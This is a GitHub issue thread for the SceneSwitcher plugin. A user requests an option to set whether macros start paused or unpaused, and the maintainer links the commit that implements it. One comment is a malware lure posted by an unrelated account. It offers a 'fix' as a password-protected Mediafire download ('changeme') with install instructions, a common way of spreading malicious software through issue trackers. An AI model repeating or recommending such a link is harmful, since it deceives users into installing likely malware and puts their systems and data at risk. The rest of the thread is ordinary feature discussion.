### ISSUE TITLE
Option to set macro starting state

### ISSUE THREAD

**Issue by Destroy666x** [WarmUpTill/SceneSwitcher#1192]
### Background

Bunch of various macros should be started paused or unpaused. E.g. if you are doing a stream event and you'd like to have that off by default most of the time, it makes sense to pause all related macros at the start of the session. You might forget to turn them off manually.

### Solution

Add macro setting to set initial macro state. Kind of similar to the variable state, which either saves, resets or sets to a specific value. Here it could be just store (default), pause, unpause - under general settings.

### Alternatives

You can of course do it with macro that pauses all the needed macros at start up. I think it's more fitting as a setting though and would be more consistent with variables.

### Anything else we should know?

\-

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by WarmUpTill** [comment]
This is implemented with https://github.com/WarmUpTill/SceneSwitcher/pull/1213/commits/93fefa103427c2156f5e965f9f1ce9784939fff0.

**Comment by Destroy666x** [comment]
Seems to work fine, thanks.
